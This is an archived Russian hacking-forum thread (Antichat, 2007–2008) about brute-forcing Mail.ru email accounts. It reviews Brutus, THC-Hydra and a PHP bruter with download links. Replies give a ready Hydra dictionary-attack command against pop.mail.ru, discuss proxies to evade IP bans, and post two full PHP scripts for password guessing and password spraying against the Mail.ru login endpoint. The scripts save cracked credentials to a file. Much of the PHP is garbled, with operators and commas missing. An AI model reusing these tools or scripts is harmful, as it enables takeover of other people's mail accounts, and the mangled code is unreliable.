Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   E-Mail (https://forum.antichat.xyz/forumdisplay.php?f=14)
-   -   Чем брутить Mail.ru (https://forum.antichat.xyz/showthread.php?t=56084)

bul.666 18.12.2007 13:38
Чем брутить Mail.ru
 
Чем брутить Mail.ru

Тестировать будем сервер pop.mail.ru
Заранее создадим пользователя и будем пытаться достать на него пароль...
Создали пользователя cccbbbaaa@mail.ru:alphabet
Будем атаковать по словарю, т.к. полным перебором смысла нет в данном случае... Время скорости полного перебора зависит от сложности пароля...
Создал словарь 819 слов, где 818 - наш

1. Brutus-AET2
Самый известный и многофункциональный брутфорс. Небольшое описание:

Brutus - удаленный опознавательный агент (проще взломщик паролей). Brutus используется для восстановления правильных маркеров доступа (обычно имя пользователя и пароль) для данной системы. Примерами поддерживаемой системы могут быть FTP сервер, пароль защищенная web-страница, консоль маршрутизатора, POP3 сервер и т.д.
Предупреждение! Некоторые антивирусы реагируют на эту программу как "злонамеренная программа".
Платформа: Windows

Тут: http://www.securitylab.ru/software/232832.php
Скачать: http://securitylab.ru/_tools/brutus-aet2.zip
---
Как им пользоваться, смотрим видео: http://video.antichat.ru/file109.html
---
Итак брутим наше мыло:
Brutus Потратил 24 секунды на взлом нашего мыла...

2. THC-Hydra
Отличный брутфорс под nix.
THC-Hydra - распараллеленый взломщик паролей к различным сервисам (FTP, POP3, IMAP, Telnet, HTTP Auth, NNTP, VNC, ICQ, PCNFS, CISCO и др.) для UNIX платформ. С помощью этой утилиты вы можете атаковать несколько сервисов одновременно.

http://www.securitylab.ru/software/233034.php
http://freeworld.thc.org/thc-hydra/
---
Как пользоваться смотрим видео: http://video.antichat.ru/file110.html
---
Hydra потратила 17 секунд на взлом нашего мыла...
---

3. PHP Mail.Ru BruteForce by NOmeR1
Обсуждение: https://forum.antichat.ru/thread49574.html
Решил его сюда включить, т.к. скипт очень интересный и получил хорошие отзывы... Он не использует сокеты, он как бы пытаеться залогиниться через страницу mail.ru =)
---
Пользоваться очень легко, достаточно ввести нужное мыло, ваше мыло, и файл - словарь...
---
Скрипт потратил меньше 20 секунд на взлом нашего мыла...
---
Пожалуйста постим сюда только брутер и инфу...
За каждую дельную инфу ставлю +5 =)

AkyHa_MaTaTa 18.12.2007 13:43
А как же genom mail-ru bruter ? Очень хороший скрипт, и работает пошустрее брутера на пхп.
Ок,здесь:
http://forum.antichat.ru/threadnav31521-1-10.html
http://forum.antichat.ru/showpost.ph...3&postcount=13
http://forum.antichat.ru/thread38778.html


скачать можно здесь

bul.666 18.12.2007 13:46
Пока потестил тока эти... Это не "Обзор всех брутеров"... По мере возможности буду выкладывать, что потестил...

Petr 27.02.2008 20:18
Да бесмысленно это всё уже, если нет потдержки прокси, маил уже банит за брут по айпи

Digimortal 27.02.2008 20:49
>> Да бесмысленно это всё уже, если нет потдержки прокси, маил уже банит за брут по айпи

кто-нибудь, знает после скольки попыток там банят по айпи ? )
если по http брутить?

Petr 28.02.2008 07:32
Я как понялтам повремени банят, попытки не считал, т.к. каждый раз было по разному, и скорость перебора была разная, мой вывод был только по времени бесприрывного перебора, так что есть вариант делать паузы а естьв ариант прокси юзать, но брута под маил хттп с прокси я не видел.

URB-VOLK 07.03.2008 23:07
У меня вопрос а может быть што неудастся сбрутить мылн с первого раза

H.T.N 14.03.2008 20:11
У меня вопрос а можно более подробгое руководство по Aet2 про все функции?

Pernat1y 14.03.2008 20:39
гидру юзай...

hydra -l login -P dictionary.dic -e ns -o log.txt -v pop.mail.ru pop3
она и побыстрее и в ней все мегапросто )

ZET36 16.03.2008 11:11
гыг вот я тоже решил небольшой брутер майла на пхп написать


для брута одного логина несколькими паролями

PHP код:

<?php
$login="testbrute"

$passfile "pass.txt"
for ($doscriot=0;$doscriot<=count($contents);$doscriot++) 
{
$passfile "pass.txt";

$handle fopen($passfile,"r");
$contents fread($handle,filesize($passfile));
fclose($handle);
$contents explode("\n",$contents);
$parol=trim($contents[$doscriot]);


$hostname "win.mail.ru"
$path "/cgi-bin/auth"
$line "";


$fp fsockopen($hostname80$errno$errstr30); 

if (!$fp) echo "$errstr ($errno)<br />\n"
else
{

$data "Login=".$login."&Domain=mail.ru&Password=".$parol."&Mpopl=693039118\r\n\r\n"

$headers "POST $path HTTP/1.1\r\n"
$headers .= "Host: $hostname\r\n";
$headers .= "Content-type: application/x-www-form-urlencoded\r\n";
$headers .= "Content-Length: ".strlen($data)."\r\n\r\n";

fwrite($fp$headers.$data); 
while (!feof($fp)) 
{
$line .= fgets($fp1024);
}
fclose($fp);
}

if($line[9]=="3")
{

$zergood 'good.txt';
$somecontent " для логина ".$login." пароль ".$parol;


if (is_writable($zergood)) {


    if (!$udacha fopen($zergood'a')) {
         echo "Не могу открыть файл ($zergood)";
         exit;
    }


    if (fwrite($udacha$somecontent) === FALSE) {
        echo "Не могу произвести запись в файл ($zergood)";
        exit;
    }
    
    echo "Ура! сбручено ($somecontent) и записано в файл ($zergood)";
    
    fclose($udacha);

} else {
    echo "Файл $zergood недоступен для записи";
}

}

}


?>
для брута одного пароля на несколько логинов

PHP код:

<?php
$parol="123456"

$loginsfile "login.txt"
for ($doscriot=0;$doscriot<=count($contents);$doscriot++) 
{
$loginsfile "login.txt";

$handle fopen($loginsfile,"r");
$contents fread($handle,filesize($loginsfile));
fclose($handle);
$contents explode("\n",$contents);
$loginsss=trim($contents[$doscriot]);


$hostname "win.mail.ru"
$path "/cgi-bin/auth"
$line "";


$fp fsockopen($hostname80$errno$errstr30); 

if (!$fp) echo "$errstr ($errno)<br />\n"
else
{

$data "Login=".$loginsss."&Domain=mail.ru&Password=".$parol."&Mpopl=693039118\r\n\r\n"

$headers "POST $path HTTP/1.1\r\n"
$headers .= "Host: $hostname\r\n";
$headers .= "Content-type: application/x-www-form-urlencoded\r\n";
$headers .= "Content-Length: ".strlen($data)."\r\n\r\n";

fwrite($fp$headers.$data); 
while (!feof($fp)) 
{
$line .= fgets($fp1024);
}
fclose($fp);
}

if($line[9]=="3")
{

$zergood 'good.txt';
$somecontent " у  пароля ".$parol." логин ".$loginsss;


if (is_writable($zergood)) {


    if (!$udacha fopen($zergood'a')) {
         echo "Не могу открыть файл ($zergood)";
         exit;
    }


    if (fwrite($udacha$somecontent) === FALSE) {
        echo "Не могу произвести запись в файл ($zergood)";
        exit;
    }
    
    echo "Ура! сбручено ($somecontent) и записано в файл ($zergood)";
    
    fclose($udacha);

} else {
    echo "Файл $zergood недоступен для записи";
}

}

}


?>
результат запишется в файл good.txt по окончанию

лично моё мнение брутить со своей машины это жесть для траффика вот небольшой подарок у кого не анлимит запустил скрипт выключил комп лёг спать и за тебя твой сайт всё сделает и никакого расхода трафика)


Время: 11:18
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице